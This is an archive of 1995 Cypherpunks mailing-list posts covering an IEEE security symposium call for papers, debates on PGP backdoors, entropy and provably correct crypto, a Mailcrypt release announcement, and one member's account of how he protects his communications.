From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 1 Aug 95 09:58:30 PDT
To: cypherpunks@toad.com
Subject: IEEE Symp on Security and Privacy - Call for papers
Message-ID: <v02120d01ac440a313f1f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>From: zurko@osf.org (Mary Ellen Zurko)
>Subject: IEEE Symp on Security and Privacy - Call for papers
>To: www-buyinfo@allegra.att.com
>Date: Tue, 1 Aug 95 9:29:33 EDT
>Cc: zurko@osf.org (Mez)
>Mailer: Elm [revision: 70.85]
>
>                           CALL FOR PAPERS
>
>1996 IEEE Symposium on                              May 6-8, 1996
>Security and Privacy                            Oakland, California
>
>                             sponsored by
>  IEEE Computer Society Technical Committee on Security and Privacy
>                         in cooperation with
>    The International Association for Cryptologic Research (IACR)
>
>Since 1980, the Symposium on Security and Privacy has been the premier
>forum for presenting developments in computer security and for
>bringing together researchers and practitioners in the field.
>
>This year, we seek to build upon this tradition of excellence by
>re-emphasizing work on engineering and applications as well as
>theoretical advances.  We also seek to broaden the scope of the
>Symposium by introducing additional topics.  We want to hear not only
>about new theoretical results, but also about work in the design and
>implementation of secure systems and work on policy relating to system
>security.  We are particularly interested in papers on policy and
>technical issues relating to privacy in the context of the Information
>Infrastructure, papers on securing unsecure applications and operating
>systems, papers that relate software and system engineering technology
>to the design of secure systems, and papers on hardware and
>architectural support for secure systems.
>
>The symposium will focus on technical aspects of security and privacy
>as they arise in commercial and industrial applications, as well in
>government and military systems.  It will address advances in the
>theory, design, implementation, analysis, and application of secure
>computer systems, and in the integration and reconciliation of
>security and privacy with other critical system properties such as
>reliability, performance, and safety.  Topics in which papers and
>panel session proposals are invited include, but are not limited to,
>the following:
>
>
>Secure systems          Privacy Issues          Access controls
>Security verification   Network security        Policy modeling
>Information flow        Authentication          Database security
>Data integrity          Security Protocols      Viruses and worms
>Auditing                Biometrics              Smartcards
>Commercial and industrial security              Intrusion Detection
>Security and other critical system properties   Distributed systems security
>Novel applications of cryptography and other security techniques
>
>We will continue the session of very brief (5-minute) talks introduced
>last year.  Our goal is to make it possible for us to hear from people
>who are advancing the field in the areas of system design and
>implementation, and who would like to present their ideas to the
>symposium audience but may lack the time and resources needed to
>prepare a full paper.  Submissions for this session will be accepted
>up to April 2, 1996 to permit us to hear of the most recent
>developments. Abstracts of these talks will be distributed at the
>conference.
>
>INSTRUCTIONS TO AUTHORS:
>
>Send six copies of your paper and/or proposal for a panel session to
>John McHugh, Program Co-Chair, at the address given below.  Papers and
>panel proposals must be received by November 6, 1996.  Papers, which
>should include an abstract, must not exceed 7500 words.  The names and
>affiliations of the authors should appear on a separate cover page
>only, as a ``blind'' refereeing process is used.  In addition to the
>paper submission, an ASCII copy of the paper title and abstract should
>be sent to the Program Co-Chair (mchugh@cs.pdx.edu) by electronic mail.
>These will be distributed electronically (without author
>identification) to the entire program committee to aid in the
>appropriate assignment of referees. Authors must certify prior to
>December 25, 1996 that any and all necessary clearances for
>publication have been obtained.
>
>Papers must report original work that has not been published
>previously, and is not under consideration for publication elsewhere.
>Abstracts, overlength papers, electronic submissions, late
>submissions, and papers that cannot be published in the proceedings
>will be rejected without review.  Authors will be notified of
>acceptance by January 16, 1996.  Camera-ready copies are due not later
>than March 4, 1996.
>
>Panel proposals should describe, in two pages or less, the objective
>of the panel and the topic(s) to be addressed.  Names and addresses of
>potential panelists (with position abstracts if possible) and of
>the moderator should also be included.  Panels are not intended to
>serve as alternate paper sessions and it is expected that, with the
>possible exception of an overview of the topic area by the panel
>chair, individual presentations by panel members will be limited to
>five to ten minutes and that at least one third of the session will be
>reserved for discussion.
>
>Submitters of abstracts for the special session of five-minute talks
>should submit one page abstracts to John McHugh, Program Co-Chair, at
>the address given below.  The abstract should be one page or less;
>Email submissions of 30 to 60 lines are preferred. Abstracts must be
>received by April 2, 1996.  Authors will be notified of acceptance or
>rejection of abstracts by April 16.  Submitted abstracts that are
>accepted will be distributed at the conference.  Presenters of
>five-minute talks are expected to register for the conference.
>Overtly commercial presentations are inappropriate.
>
>The Symposium will also include informal poster sessions where
>preliminary or speculative material, and descriptions or
>demonstrations of software, may be presented.  Send one copy of your
>poster session paper to Dale Johnson, at the address given below, by
>January 31, 1996, together with certification that any and all
>necessary clearances for presentation have been obtained.
>
>Again this year, we will attempt to counsel prospective authors.  If
>you have questions about whether or how to present your work to the
>symposium, please send email to the Chair (dmj@mitre.org), and we will
>do our best to assist you.
>
>Information about this conference will be also be available by
>anonymous ftp from ftp.cs.pdx.edu in directory /pub/SP96, on the web
>at http://www.cs.pdx.edu/SP96. The program chairs can be reached by
>email at sp96@cs.pdx.edu.
>
>PROGRAM COMMITTEE
>
>Dave Bailey, Galaxy Computer Services, USA
>Terry Vickers Benzel, TIS, USA
>Lee A. Benzinger, Loral, USA
>Debbie Cooper, DMCooper, USA
>Oliver Costich, Independent Consultant, USA
>Yves Deswarte, LAAS-CNRS & INRIA, FR
>Jim Gray, Hong Kong U. of Sci. and Tech, HK
>Lee Gong, SRI, USA
>Sushil Jajodia, GMU, USA
>Paul Karger, GTE, USA
>Carl Landwehr, NRL, USA
>John McLean, NRL, USA
>Catherine A. Meadows, NRL, USA
>Rich Neely, CTA, USA
>Sylvan S. Pinsky, DoD, USA
>Mike Reiter, AT&T, USA
>Sue Rho, TIS, USA
>Peter  Ryan, DRA, UK
>Tom Schubert, Portland State Univ., USA
>Stuart Stubblebine, AT&T, USA
>Elisabeth Sullivan, Sequent, USA
>Tom Van Vleck, Taligent, USA
>Vijay Varadharajan, Univ. of Western Sydney, AU
>Yacov Yacobi, Belcore, USA
>Raphael Yahalom, Hebrew University, Israel
>Mary Ellen Zurko, OSF, USA
>
>
>For further information concerning the symposium, contact:
>
>
>  Dale Johnson, General Chair        John McHugh, Program Co-Chair
>  The MITRE Corporation              Computer Science Department
>  Mailstop A156                      Portland State University
>  202 Burlington Rd                  P.O. Box 751
>  Bedford, MA 01730-1420, USA        Portland OR 97207-0751, USA
>  Tel: +1 (617) 271-8894             Tel: +1 (503) 725-5842
>  Fax: +1 (617) 271-3816             Fax: +1 (503) 725-3211
>  dmj@mitre.org                      mchugh@cs.pdx.edu
>
>  Steve Kent, Vice Chair             George Dinolt, Program Co-Chair
>  BBN Systems and Technologies       Loral WDL
>  Mailstop 13/2a                     P.O. Box 49041, MS X20
>  70 Fawcett Street                  San Jose, CA 95161-9041
>  Cambridge, MA 02138                Tel: +1 (408) 473-4150
>  Tel: +1 (617) 873-6328             Fax: +1 (408) 473-4272
>  Fax: +1 (617) 873-4086             dinolt@wdl.loral.com
>  kent@bbn.com
>
>  Charles Payne, Treasurer
>  Secure Computing Corporation
>  2675 Long Lake Road
>  Roseville, MN  55113
>  Tel: +1 (612) 628-1594
>  Fax: +1 (612) 628-2701
>  cpayne@sctc.com
>
>  Peter Ryan, European Contact       Jim Gray, Asia/Pacific Contact
>  Defence Research Agency            Department of Computer Science
>  Room NX17                          Hong Kong Univ. of Science & Technology
>  St Andrew's Rd                     Clear Water Bay, Kowloon, Hong Kong
>  Malvern                            Tel: +852 358-7012
>  Worcs WR14 3PS,UK                  Fax: +852 358-1477
>  Tel +44 (0684) 895845              gray@cs.ust.hk
>  Fax +44 (0684) 894303
>  ryan@rivers.dra.hmg.gb
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 31 Jul 95 22:17:22 PDT
To: Matthew Ghio <ghio@cmu.edu>
Subject: Re: ssh protocol
In-Reply-To: <9507312036.AA08394@toad.com>
Message-ID: <Pine.LNX.3.91.950801124040.12351B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Matthew Ghio wrote:

> Tatu Ylonen <ylo@cs.hut.fi> wrote:
> > The basic idea behind the protocol goes roughly like this:
> >   1. Exchange session keys using Diffie-Hellman
> >   2. Each side sends a signature of the Diffie-Hellman exchange (the
> >      signature can be with any of a number of algorithms; RSA and
> >      Elliptic Curve systems have been defined).
> 
> I've been playing with the cryptotcp program available from utopia..  It
> has some bugs but works pretty well, if you don't mind waiting 20-30
> seconds at the beginning.  It does a Diffie-Hellman exchange and 3DES over
> telnet.  How hard would it be to add some sort of authentication to this
> program?

Yes, I'm interested too, also because cryptotcp looks like a good
candidate as component of my "SafeSox" pet project, to make unmodified TCP
applications secure. Apparently, a sockd daemon could be easily modified
to open encrypted TCP connections to remote cryptod daemons, instead of
targeting remote servers directly. The next logical step would be a
Winsock (or Mac) version of that cryptified sockd, to be run on the same
PC where the applications live (not everybody has a UNIX box on the same
network). No modifications would be required in cryptod: 


Unmod. --- [socksifying DLL] === [crypto-sockd] ~~~~ [cryptod] +++ [server]
Winsock 
Client

--- = local API call
=== = local SOCKS connection (same network or same machine)
~~~ = cryptotcp connection across the Internet
+++ = cleartext TCP connection on the same network or same machine

Another area where I would appreciate analysis by someone more competent
than myself is cryptotcp's random key generator. Even though the
randomizer (in random.c) is called several times, stirring in the pool
also quantities of entropy depending on the time spent during the
establishment of the TCP connection, I doubt that the total resulting
entropy can be that high.  Perhaps, adding some purely local data a' la
randseed.bin (not available to an eavesdropper) would reduce the risk of
the scheme being brute-forced. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 1 Aug 95 04:25:29 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <9508011120.AA11301@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> 	Clever back doors are not accomplished by an obvious program
> change, but rather by the subtle use of some technique that appears to
> do one thing when it actually does something else.  As a good example, a
> subtle interation with the rest of the environment could modify the key
> generation algorithm after it is loaded.  Unfortunately, PGP is too
> large to verify against such back doors, so I ask again:
> 
> 	Why (specifically) do you think the MIT version of PGP has no
> backdoors and is not subject to attacks such as the one outlined in my
> previous posting?


This is a good question. 

Subtle backdoors hidden in such a program may be difficult to find out.
It might be more effective to use the PGP file format, to understand
pgp as a reference implementation, and to write you own pgp compatible
program where you can generate your keys etc. in the way you prefer.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 1 Aug 95 04:35:47 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <9508011127.AA11306@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> This is where you are very wrong.  I am not saying that "if you can't
> find any holes it must be secure".  What I am saying is that the
> source is available, and thousands of people have looked at the
> source, and none of them have found any holes in it.


It is definitely much more difficult to implant a backdoor into a program
which is available as source code than into a black box. 

BTW: Has anyone ever found a modified and weakened version of pgp ?


Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 1 Aug 95 04:45:31 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <9508011130.AA11309@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> >However, to help derail this V-chip being mandated, what if we (I mean
> >activists, writers of columns, etc.) "insisted" that _commercials_ be
> >similarly labelled?
> 
> I love it.  Great idea, Tim!


Someone in Germany developed a device which stops the VTR while they are
showing the commercials, but it isn't available yet.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 1 Aug 95 12:48:25 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: U.S. Banks are not all that bad
In-Reply-To: <v02120d01ac4219a2e38e@[199.2.22.120]>
Message-ID: <9508011938.AA12258@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Barnes writes:
>At First Interstate recently, I had to make a withdrawal from
>the teller, as the ATM was broken. Their policy _does_
>reqiure a "counter check", and normally they charge, but when
>I explained that the ATM was kaput they did it for free.
>It is _much_ cheaper for them if you use the ATM, and this
>kind of policy is designed to encourage you to do this. It's
>the kind of thing that the market will sort out nicely --
>if it irritates people and loses them money more than it
>saves them money, they will stop doing it.

Sure they're happier if you use the ATM.  It costs them less
per transaction, plus they *charge* you to use the damn thing.
How many people do you think would put up with $1.00 or $1.25
to do a transaction at a human teller?  Most banks charge about
that much for "foreign" (other than those they own) ATM use.
Some even charge that much for *all* ATM use if you don't get
the "premium" accounts.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 1 Aug 95 14:50:03 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: a hole in PGP
Message-ID: <199508012145.OAA05756@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>It is definitely much more difficult to implant a backdoor into a program
>which is available as source code than into a black box. 
>
>BTW: Has anyone ever found a modified and weakened version of pgp ?

Not that I know of, but there were some versions with a bug in the random-input
generation - I forget if that was with ~2.2 or ~2.6.0; Colin Plumb had something
to do with it.  I've recently acquired ViaCrypt 2.7.1 for WinDows, and one
nice feature 
is that in addition to typing in random keystrokes, you can click your mouse in 
a box and wave it around to input randomness.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 1 Aug 95 14:49:14 PDT
To: Nathan Zook <nzook@bga.com>
Subject: Re: OS noise  [Was: a hole in PGP]
Message-ID: <199508012146.OAA05789@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 31 Jul 1995, Phil Fraering wrote:
>
>> For better or for worse, we all must use programs (or collections
>> of programs) that large or larger: even if PGP could be implemented
>> in 1 % of the current source code, it would still be running in an
>> operating system that's cramped in 4 megabytes of ram, because that's
>> a characteristic of the common modern operating systems.
>
>Ahem!  Commiedore APOLOGIED when it released its 512K OS a couple of 
>years ago.  These things _don't_ have to be this large.

Foo.  Unix used to work just fine in 64K+64K split I&D space on a PDP-11 :-)
It got bigger when lots of stuff was added, especially networking and 
X windows, and I wouldn't want to go back to small machines.  

However, during one such discussion on comp.unix.wizards or wherever,
Dennis Ritchie posted a nice article about "Mine is smaller than yours",
saying "here's how big my OS is" (I think ~250K, and the OS was 8th or 9th
Edition),
"telnet over to foovax, it's this big", "datakit over to barmips, it's that
big",
"some other networking method over to some other machine, it's that big",
"yet another protocol over to yet another bigger machine", 
"display size of the operating systems on my 256K Blit and Gnot terminal, etc.

And QNX's kernel fits just fine inside the cache on a 486,
though it wouldn't actually stay there much.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 1 Aug 95 14:50:17 PDT
To: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Subject: Re: a hole in PGP
Message-ID: <199508012146.OAA05807@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>	Now, my knowledge, time and resources are limited. I see that MIT
>or whomever has made a program that, under test, is more secure than my
>XOR 00000000 implementation. I may not fully trust them but it is better
>than anything I could come out with.

Foo.  Clipper is better than anything I could come up with from scratch,
and it's provably untrustable.  (I could easily build better stuff out of
existing pieces like DES and IDEA, but that's a separate issue.)
Even Enigma's pretty strong, and look what it got its users...
Some of Dr. Fred's distrust is well-founded.

DES is also pretty good, and it's looking less and less likely that there's
a secret NSA backdoor in it (other than differential cryptanalysis
and maybe linear cryptanalysis), but it and IDEA and MD5 fundamentally depend on
messiness and obscurity for their security (plus elimination of obvious holes.)
Maybe the authors of IDEA are paid by the same space aliens who really run NSA?

RSA has some provable strength to it, though it's not totally risk-free.  
(One Time Pads do too, and yet people manage to misunderstand and
misimplement them almost as much as they mishandle keys.)  If you want a
provably strong cryptosystem,
you could build one out of pure RSA, which would merely be painfully slow,
but could be usable.  Or you could build a Blum-Blum-Shub Random Number
generator,
and use it to generate one-time-pads (putting BBS into PGP version N+1 would be
interesting...)

However, the real weak point of PGP doesn't appear to be the algorithms, or
the implementation (except ease-of-use issues); it's attacks on the
computers themselves.
TEMPEST is fun, if difficult and expensive, black-bag-jobs on keyboards
are easy and effective if you're a good housebreaker, and you can always
try viruses and trojan horses to distribute keystroke-stealers.
I seem to remember that Dr. Fred was once a proponent of using viruses for
good purposes for propagation of information or whatever?  Anathema!
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 12:19:05 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <ac43be3d13021004ec3b@[205.199.118.202]>
Message-ID: <9508011911.AA11465@all.net>
MIME-Version: 1.0
Content-Type: text


...
> >PGP, but in the algorithm itself. RSA-in-4-lines-perl is probably
>                                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >provably correct.  To guard against trapdoors in PGP, you should
>  ^^^^^^^^^^^^^^^^^
> >verify the correctness of the PRNG, Key Generator, and that no private
...
> This doesn't seem likely. I mean, doesn't "RSA-in-4-lines-of-Perl" *of
> necessity* make use of external library/utility functions? Such as the "dc"
> math routines for the PRNG? Part of its compactness is that it makes use of
> available libraries.

This issue is an interesting one and one worthy of being addressed. 
There are a couple of concerns here (I approximately quote from a
submitted paper on the secure W3 server with quotation marks):

Concern 1:
	"The secure (program) is designed in such a way that we can
	demonstrate (subject to the propriety of compilers, operating
	system functions, and other things in the environment) that once
	the daemon is started, only the desired affects result." 

Concern 2:
	The environment has an insecurity specific to the secure
	program used as a means of subverting the function of the
	secure program.

I pretty much believe that Concern 1 should be addressed by all programs
that claim to be secure.  That is, subject to the rest of the world woking
right, the secure program works right.

I believe that concern 2 should be addressed by all programs that claim
to be secure in a particular environment.  That is, beyond being secure
assuming the environment is secure, we might want to eliminate the
assumption about the environment by showing it to be justified.  In
terms of attacking systems, it is necessaary to subvert many different
environments for this issue to be important for widespread use of PGP,
or at least to subvert several of the more common environments (such as
what the Thompson c compiler mentioned in his Turing award talk did).

> Anything that "reaches out" to external libraries or utilities would then
> have the vulnerabilities of _those_ libraries and utilities, which may or
> may not be provably correct themselves. (And the issue of any PRNG being
> probably correct or not is of course an interesting, and deep, question.)
> 
> I do think the issues of modular design and provable correctness--or
> approximations to it--are interesting ones.

I think that this issue can generally be addressed by a divide and
conquer strategy.  Prove that the called routines are correct and
confined under all possible parameters, do the same for the calling
routines, do the same for the interaction between them, and I think you
have it.  This is pretty easy for one or two routines, but when you take
the OS into account, the C compiler into account, the program itself
into account, and the external environment into account, you run into
some serious limitations.  For example, you may (in some cases) have to
show that under all possible sequences of interrupt timings and stack
conditions, the system operates correctly (which almost none currently
do).  Unless you design with this sort of thing in mind, it's very hard
to demonstrate these properties even for limited subproblems. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 1 Aug 95 12:25:27 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <ac43be3d13021004ec3b@[205.199.118.202]>
Message-ID: <199508011915.PAA02085@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



[Tim responds to my note on "provably correct implementation"}

> 
> Anything that "reaches out" to external libraries or utilities would then
> have the vulnerabilities of _those_ libraries and utilities, which may or
> may not be provably correct themselves. (And the issue of any PRNG being
> probably correct or not is of course an interesting, and deep, question.)
> 

  What I meant by my message is in some circumstances, an implementation
can be proven correct (i.e. to do what it says it does correctly) What
I mean by implementation is the source at the highest level, not the
module dependencies which are abstractly disconnected from the application.
(e.g. if a multiprecision math library that comes with the operating
system is used by PGP, the source to PGP could be said to be "trapdoor free"
even if the math library has an NSA monitoring function built into it)

 Each layer of course relies on the correctness of the layer beneath it, much
like a theorem proof relies on the proof of the statements that makes it
up. Thus, RSA-in-4-lines can be observed to be a correct implementation
of RSA without any trapdoors (like secretly storing or leaking private
key bits) at the level of its source code. Of course, the Perl interpreter
itself would have to be proven correct, but we assume that no RSA trap
doors have been put into perl because perl was available long before
PGP and RSA-in-4-lines perl and is widely distributed. The probability
of a trapdoor in perl is small.


The hierarchy looks like this:

RSA-in-4-lines :: DEPENDS_ON_CORRECTNESS_OF { Perl, DC, RSA_Algorithms }

Perl :: DEPENDS_ON_CORRECTNESS_OF { C, Unix, Perl_Algorithms }
DC :: DEPENDS_ON_CORRECTNESS_OF { C, Unix, DC_Algorithms }

C :: DEPENDS_ON_CORRECTNESS_OF { C_compiler } 
C_compiler :: DEPENDS_ON_CORRECTNESS_OF { Assembler }
Assembler :: DEPENDS_ON_CORRECTNESS_OF { instruction_set }
instruction_set :: DEPENDS_ON_CORRECTNESS_OF { hardware }

Now even if it were possible to prove the correctness of all those layers
(which I find doubtful. Some kind of Goedel/Turing limitation is going to turn
up somewhere), what if the 'hardware' isn't correct. (e.g. Pentium bug)
There could be a one-in-a-zillion bug that randomly leaks keybits. 

IMHO, there's no sense in worrying about stuff like this. If your data
is so valuable that you need absolute theoretical security, use a 
one-time-pad with a simple redundant provably secure device
(also shielded from TEMPEST attacks), and have the thing implanted
in your skull. ;-)


-Ray

 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Tue, 1 Aug 95 12:22:58 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
Message-ID: <199508011923.PAA17989@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


So Dr. Cohen, what do you use when you want to send a message across
the Internet with better security than cleartext?  What do your
recommend to others?

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 31 Jul 95 22:51:57 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010250.AA14743@all.net>
Message-ID: <199508010544.PAA07308@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello fc@all.net (Dr. Frederick B. Cohen)
  and mab@crypto.com (Matt Blaze)
  and cypherpunks@toad.com

I'm afraid I missed the start of this thread, sorry if I'm repeating...

...
> The fact is, you seem to support the idea that PGP is secure without a
> reasonable basis, and when pushed a bit harder, agree that it probably
> is not secure. 

The problem is that "secure" is not really something that can be proved.
(I'm not sure if that's a theoretical or a practical fact, but it remains.)
For one thing, I'm not even sure the RSA algorithm itself is secure.
(At least I've never heard of a proof; have you?)

As long as I'm using PGP to send letters to grandma, the cost (to me) of
a successful attack is small. I therefore expend little effort to verify
that it is secure.

If/when I start to use it for more serious applications, I will read 
the source code. I might even modify it (eg. accord less entropy per
keystroke) if I'm not happy with it.

If circumstances warranted, I could re-implement it from the appropriate
RFC (is it out yet or still draft?). However, in such circumstances,
I very much suspect a one-time-pad would be used.

> This is how professionals deal with these sorts of questions:
> 
> 	If you do not believe it is secure, you should say why not.

I do not believe that it can be proven secure.

> 	In my case, I question its security and have given at least one
> 	example of how it could be insecure.

If you doubt the key-gen routine:
  * you are certainly free to make up your own keys any way you like,
  * write your own and argue that it's better, and/or
  * find a way to break the key-gen routine.

> 	If you do believe it is secure, you should be able to support
> 	your contention with more than reference to RFCs, vague
> 	comments, and claiming that you have read the code and didn't
> 	catch anything.

Adding to the list:
  * I've never heard of anyone catching anything (except the headers on
clearsigned messages problem).

> 	If you cannot specifically address my question, say so, tell us
> 	all that the security of PGP is an open question, and either
> 	leave it open or go after closing it.

The security of anything is an open question.

You shouldn't spend more on proving security than a breach would cost.


Hope I'm making sense...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 1 Aug 95 13:00:16 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT: Mailcrypt 3.3 for GNU Emacs
Message-ID: <199508011959.PAA00818@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mailcrypt version 3.3 is now available.

Mailcrypt is an Emacs Lisp package which provides a simple interface
to message encryption with PGP.  (You do use Emacs to handle your mail
and news, right?)

Features: Encryption, decryption, signing, adding keys, extracting
keys, passphrase caching with timeout, multiple secret key (identity)
support, a simple but flexible interface to Cypherpunk remailers
(including chaining, response blocks, pseudonyms, and Mixmaster
support), and an automatic keyserver interface via HTTP.

*We* think it's the best interface to these functions anywhere, but
then again, we're biased.

The NEWS file is appended to this message.

Obtain it through the Mailcrypt home page at

	http://cag-www.lcs.mit.edu/mailcrypt/

or from the FTP mirror at

	ftp://cag.lcs.mit.edu/pub/patl/

and enjoy!

 - Patrick J. LoPresti (patl@lcs.mit.edu)
 - Jin S. Choi (jin@atype.com)
   Tue Aug  1 15:00:27 1995 -0500

======================================================================

Noteworty changes in Mailcrypt version 3.3:

Numerous minor bugs have been fixed.

Mailcrypt now requires at least FSF Emacs version 19.28 or XEmacs
version 19.12.  Sorry, but anything else is too annoying.

Support has been added for reading mail under (ding) GNUS.



Noteworthy changes in Mailcrypt version 3.2:

Mailcrypt now uses "start-process" instead of "call-process-region" to
run PGP; this uses a pipe instead of a temp file for various inputs,
including your passphrase.  Ahem.

All Mailcrypt commands now start with the prefix `C-c /' to bring
Mailcrypt into line with documented GNU standards.

`mc-insert-public-key' is now bound to `C-c / x' (an in "extract")
instead of `C-c a'.

`mc-deactivate-passwd' is bound to `C-c / f' (as in "forget").

`mc-read-mode' and `mc-write-mode' are now full-blown minor modes.  So
you can do, for example, `M-x mc-install-write-mode' from a Text mode
buffer and have the normal encryption and signing commands available.
The keymaps for the modes are configurable variables.

Interactive commands `mc-encrypt-region', `mc-sign-region', etc. are
now defined.

If you use RMAIL and you say no to "Replace encrypted message with
decrypted?", you will be dropped into RMAIL mode for viewing.

RMAIL summary mode is now supported.

Documentation in the form of a Texinfo file is now part of the
distribution.

Mailcrypt can now fetch a needed key from finger, HTTP, or any of a
list of locally stored keyrings.  `C-c / k' initiates a fetch
manually; Mailcrypt will offer to initiate one automatically as
appropriate during encryption or signature verification.

The remailer functions now support Mixmaster.

`C-c / d' can handle conventionally encrypted messages.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMB6GjHr7ES8bepftAQGXLQP/W4sWXEWficWMlQ340StWd+RC5pJmFh4d
9jlAodH/Gmv1slPmJy21WDPqeyp+3z5BJ8BUgz98e7rqooZ3tB7Fy6cT4Q3UJ0Gv
+WZQBkNV4tT7bNjCQxjIE3QrowGBeko0CZIMwGlRujioguHMgHcm8XTJO37ZuypB
Sn24f/uPkGc=
=8f59
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 13:19:33 PDT
To: marc@cam.ov.com (Marc Horowitz)
Subject: What do I use?
In-Reply-To: <199508011923.PAA17989@dun-dun-noodles.cam.ov.com>
Message-ID: <9508012013.AA14958@all.net>
MIME-Version: 1.0
Content-Type: text


> So Dr. Cohen, what do you use when you want to send a message across
> the Internet with better security than cleartext?  What do your
> recommend to others?

I use different techniques when different levels of protection are
required, and I definately don't use the Internet for anything that is
really vital because of the ease of gaining intelligence indicators
based on traffic analysis.

I commonly use FAX machines from non-fixed locations for point-to-point
communications where I don't want it to be tapped from my end.  I often
use telephone lines with modems for other secure communications
depending on the requirements.  I have used DES for some limited items
with the key sent over a separate channel, RSA for short time-limited
secure messages, one-time-pads for certain really critical stuf between
myself and a single other trusted party, special secure telephones as
required by organizations for select communications, various custom
ciphers for communication with parties who have special requirements,
dictionary and codebook ciphers on rare occasions, wheel ciphers of
various sorts, a variety of custom authentication ciphers, and who knows
what else. 

I never recommend a solution without knowing a fair amount about the
specific challenge it is supposed to address.  I typically start with an
understanding of the general environment, the financial and/or human
issues, the threat profile, the protection environment, the other
dependencies and protection factors, and other factors related to the
reasons for protection.  Once I have this understanding, I make value
judgements about how much I trust things relative to the requirement for
trust and other limitations presented by the situation.

Sorry I can't give you a pat answer like "I use Joe's Cryptobox", but
that's just the way it is.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



